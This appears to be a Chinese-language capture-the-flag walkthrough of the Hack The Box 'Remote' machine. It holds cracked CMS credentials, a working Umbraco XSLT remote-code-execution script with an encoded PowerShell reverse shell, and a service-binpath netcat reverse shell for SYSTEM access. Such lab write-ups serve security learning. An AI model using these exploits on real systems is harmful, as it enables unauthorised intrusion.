Recon Nmap Scan [toc]Nmap扫描结果显示开放了SMB相关,FTP、rcpbind以及Web服务端口。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 # Nmap 7.80 scan initiated Wed May 20 08:52:04 2020 as: nmap -sC -sV -oN nmap/initial 10.10.10.180 Nmap scan report for 10.10.10.180 Host is up (0.34s latency). Not shown: 993 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd |_ftp-anon: Anonymous FTP login allowed (FTP code 230) | ftp-syst: |_ SYST: Windows_NT 80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Home - Acme Widgets 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/tcp6 rpcbind | 100000 2,3,4 111/udp rpcbind | 100000 2,3,4 111/udp6 rpcbind | 100003 2,3 2049/udp nfs | 100003 2,3 2049/udp6 nfs | 100003 2,3,4 2049/tcp nfs | 100003 2,3,4 2049/tcp6 nfs | 100005 1,2,3 2049/tcp mountd | 100005 1,2,3 2049/tcp6 mountd | 100005 1,2,3 2049/udp mountd | 100005 1,2,3 2049/udp6 mountd | 100021 1,2,3,4 2049/tcp nlockmgr | 100021 1,2,3,4 2049/tcp6 nlockmgr | 100021 1,2,3,4 2049/udp nlockmgr | 100021 1,2,3,4 2049/udp6 nlockmgr | 100024 1 2049/tcp status | 100024 1 2049/tcp6 status | 100024 1 2049/udp status |_ 100024 1 2049/udp6 status 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 2049/tcp open mountd 1-3 (RPC #100005) Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: 3m28s | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-05-20T00:56:46 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Wed May 20 08:56:48 2020 -- 1 IP address (1 host up) scanned in 284.46 seconds
NFS 访问21端口anonymous
登陆后无任何信息,判断为一个 rabbit hole。 访问Web页面后,在其中发现一个urlhttp://10.10.10.180/umbraco/#/login/false?returnPath=%252Fforms
,从中得知是一个叫umbraco
的CMS,搜索后发现存在远程代码可执行漏洞Link Here ,但前提是需要用户凭证。故猜想找到用户凭证,使用POC,拿到shell。 同时目标还开放了rcpbind端口,使用nmap扫描出其挂载了一个目录site_backups
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 # Nmap 7.80 scan initiated Wed May 20 09:23:57 2020 as: nmap -p111 --script=nfs-ls.nse,nfs-showmount.nse,nfs-statfs.nse -oN nmap/nfs 10.10.10.180 Nmap scan report for 10.10.10.180 Host is up (1.6s latency). PORT STATE SERVICE 111/tcp open rpcbind | nfs-ls: Volume /site_backups | access: Read Lookup NoModify NoExtend NoDelete NoExecute | PERMISSION UID GID SIZE TIME FILENAME | rwx------ 4294967294 4294967294 4096 2020-05-19T20:22:57 . | ?????????? ? ? ? ? .. | rwx------ 4294967294 4294967294 64 2020-02-20T17:16:39 App_Browsers | rwx------ 4294967294 4294967294 4096 2020-02-20T17:17:19 App_Data | rwx------ 4294967294 4294967294 4096 2020-02-20T17:16:40 App_Plugins | rwx------ 4294967294 4294967294 8192 2020-02-20T17:16:42 Config | rwx------ 4294967294 4294967294 64 2020-02-20T17:16:40 aspnet_client | rwx------ 4294967294 4294967294 49152 2020-02-20T17:16:42 bin | rwx------ 4294967294 4294967294 64 2020-02-20T17:16:42 css | rwx------ 4294967294 4294967294 152 2018-11-01T17:06:44 default.aspx |_ | nfs-showmount: |_ /site_backups | nfs-statfs: | Filesystem 1K-blocks Used Available Use% Maxfilesize Maxlink |_ /site_backups 31119356.0 12288060.0 18831296.0 40% 16.0T 1023 # Nmap done at Wed May 20 09:24:25 2020 -- 1 IP address (1 host up) scanned in 28.45 seconds
Enumeration 将其挂在到本地后,开始枚举
1 2 3 4 5 6 7 8 9 10 11 12 /mnt root@kali ❯ mkdir Remote /mnt root@kali ❯ mount 10.10.10.180:/site_backups /mnt/Remote /mnt root@kali 9s ❯ cd Remote /mnt/Remote root@kali ❯ ls App_Browsers App_Data App_Plugins aspnet_client bin Config css default.aspx Global.asax Media scripts Umbraco Umbraco_Client Views Web.config
在Web.config中发现了版本号,符合之前提到的漏洞所要求
1 2 3 ~/Documents/HTB/Remote/nfs root@kali ❯ cat Web.config| grep umbracoConfigurationStatus <add key="umbracoConfigurationStatus" value="7.12.4" />
同时在Umbraco.sdf中发现了使用SHA1加密的用户凭证 用户adminadmin@htb.local
密码b8be16afba8c314ad33d812f22a04991b90e2aaa
1 2 3 4 5 6 7 ~/Documents/HTB/Remote/nfs/App_Data root@kali ❯ strings Umbraco.sdf | grep @htb.loca adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50 adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-US82756c26-4321-4d27-b429-1b5c7c4f882f smithsmith@htb.localjxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749-a054-27463ae58b8e ssmithsmith@htb.localjxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749 ssmithssmith@htb.local8+xXICbPe7m5NQ22HfcGlg==RF9OLinww9rd2PmaKUpLteR6vesD2MtFaBKe1zL5SXA={"hashAlgorithm":"HMACSHA256"}ssmith@htb.localen-US3628acfb-a62c-4ab0-93f7-5ee9724c8d32
使用解密工具获得密码baconandcheese
1 b8be16afba8c314ad33d812f22a04991b90e2aaa:baconandcheese
User.txt 随后我们编辑Poc,原本的POC中执行的是calc.exe
,既使用计算器。我们将其改为Powershell.exe
后,添加参数,结合我以前的文章提到的powershell的用法,使用base64编码后的reverse shell code即可摆脱引号带来的转义问题。从而获得Shell。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 import requests;from bs4 import BeautifulSoup;def print_dict (dico ): print (dico.items()); print ("Start" );payload = '<?xml version="1.0"?><xsl:stylesheet version="1.0" \ xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" \ xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">\ <msxsl:script language="C#" implements-prefix="csharp_user">public string xml() \ { string cmd = "-e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACcAMQAwAC4AMQAwAC4AMQA0AC4AMQAwADUAJwAsADQANAAzACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAnAFAAUwAgACcAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAnAD4AIAAnADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAAoA"; System.Diagnostics.Process proc = new System.Diagnostics.Process();\ proc.StartInfo.FileName = "powershell.exe"; proc.StartInfo.Arguments = cmd;\ proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; \ proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; } \ </msxsl:script><xsl:template match="/"> <xsl:value-of select="csharp_user:xml()"/>\ </xsl:template> </xsl:stylesheet> ' ;login = "admin@htb.local" ; password="baconandcheese" ; host = "http://10.10.10.180" ; s = requests.session() url_main =host+"/umbraco/" ; r1 = s.get(url_main); print_dict(r1.cookies); url_login = host+"/umbraco/backoffice/UmbracoApi/Authentication/PostLogin" ; loginfo = {"username" :login,"password" :password}; r2 = s.post(url_login,json=loginfo); url_xslt = host+"/umbraco/developer/Xslt/xsltVisualize.aspx" ; r3 = s.get(url_xslt); soup = BeautifulSoup(r3.text, 'html.parser' ); VIEWSTATE = soup.find(id ="__VIEWSTATE" )['value' ]; VIEWSTATEGENERATOR = soup.find(id ="__VIEWSTATEGENERATOR" )['value' ]; UMBXSRFTOKEN = s.cookies['UMB-XSRF-TOKEN' ]; headers = {'UMB-XSRF-TOKEN' :UMBXSRFTOKEN}; data = {"__EVENTTARGET" :"" ,"__EVENTARGUMENT" :"" ,"__VIEWSTATE" :VIEWSTATE,"__VIEWSTATEGENERATOR" :VIEWSTATEGENERATOR,"ctl00$body$xsltSelection" :payload,"ctl00$body$contentPicker$ContentIdValue" :"" ,"ctl00$body$visualizeDo" :"Visualize+XSLT" }; r4 = s.post(url_xslt,data=data,headers=headers); print ("End" );
执行脚本后获得shell
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 ~/Documents/HTB/Remote root@kali 1m 13s ❯ nc -nlvp 443 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::443 Ncat: Listening on 0.0.0.0:443 Ncat: Connection from 10.10.10.180. Ncat: Connection from 10.10.10.180:49684. PS C:\windows\system32\inetsrv> whoami iis apppool\defaultapppool PS C:\windows\system32\inetsrv> cd C:\users\public PS C:\users\public> type uesr.txt PS C:\users\public> ls Directory: C:\users\public Mode LastWriteTime Length Name ---- ------------- ------ ---- d-r--- 2/19/2020 3:03 PM Documents d-r--- 9/15/2018 3:19 AM Downloads d-r--- 9/15/2018 3:19 AM Music d-r--- 9/15/2018 3:19 AM Pictures d-r--- 9/15/2018 3:19 AM Videos -ar--- 5/22/2020 1:13 AM 34 user.txt PS C:\users\public> type user.txt 16155d17d30cbbe04305511f91460454 PS C:\users\public>
Privilege Escalation WinPEAS.exe 将WinPEAS上传至目标机器后,发现我们有权限对一个服务进行修改。
1 2 3 4 [+] Modifiable Services(T1007) [?] Check if you can modify any service https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services LOOKS LIKE YOU CAN MODIFY SOME SERVICE/s: UsoSvc: AllAccess, Start
root.txt 使用qc查看该服务,我们可以对BINARY_PATH_NAME
进行修改,从而执行我们想要执行的命令
1 2 3 4 5 6 7 8 9 10 11 12 13 14 C:\users\public\Downloads>sc qc UsoSvc sc qc UsoSvc [SC] QueryServiceConfig SUCCESS SERVICE_NAME: UsoSvc TYPE : 20 WIN32_SHARE_PROCESS START_TYPE : 2 AUTO_START (DELAYED) ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Windows\system32\svchost.exe -k netsvcs -p LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Update Orchestrator Service DEPENDENCIES : rpcss SERVICE_START_NAME : LocalSystem
使用以下命令编辑UsoSvc的binpath
,将其设定为使用nc reverse shell,然后将服务关闭,重启服务
1 2 3 sc config UsoSvc binpath= "C:\users\public\downloads\nc.exe -e cmd.exe 10.10.14.105 443" net stop UsoSvc net start UsoSvc
可以看到,服务卡在了启动的阶段,同时我们也获得了shell
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 ~/Documents/HTB/Remote/www root@kali ❯ nc -nlvp 443 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::443 Ncat: Listening on 0.0.0.0:443 Ncat: Connection from 10.10.10.180. Ncat: Connection from 10.10.10.180:49686. Microsoft Windows [Version 10.0.17763.107] (c) 2018 Microsoft Corporation. All rights reserved. C:\users\public\Downloads>sc config UsoSvc binpath= "C:\users\public\Downloads\nc.exe -e cmd.exe 10.10.16.38 1337" sc config UsoSvc binpath= "C:\users\public\Downloads\nc.exe -e cmd.exe 10.10.16.38 1337" [SC] ChangeServiceConfig SUCCESS C:\users\public\Downloads>wmic service NAMEOFSERVICE call startservice wmic service NAMEOFSERVICE call startservice No Instance(s) Available. C:\users\public\Downloads>net stop UsoSvc && net start UsoSvc net stop UsoSvc && net start UsoSvc The Update Orchestrator Service service is stopping. The Update Orchestrator Service service was stopped successfully. The service is not responding to the control function. More help is available by typing NET HELPMSG 2186.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 ~/Documents/HTB/Remote/exploit root@kali ❯ nc -nlvp 1337 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::1337 Ncat: Listening on 0.0.0.0:1337 Ncat: Connection from 10.10.10.180. Ncat: Connection from 10.10.10.180:49687. Microsoft Windows [Version 10.0.17763.107] (c) 2018 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami whoami nt authority\system C:\Windows>cd C:\users\administrator\desktop cd C:\users\administrator\desktop C:\Users\Administrator\Desktop>type root.txt type root.txt 7d625f8ef71d3bdf03de7cfa9771e4e6 C:\Users\Administrator\Desktop>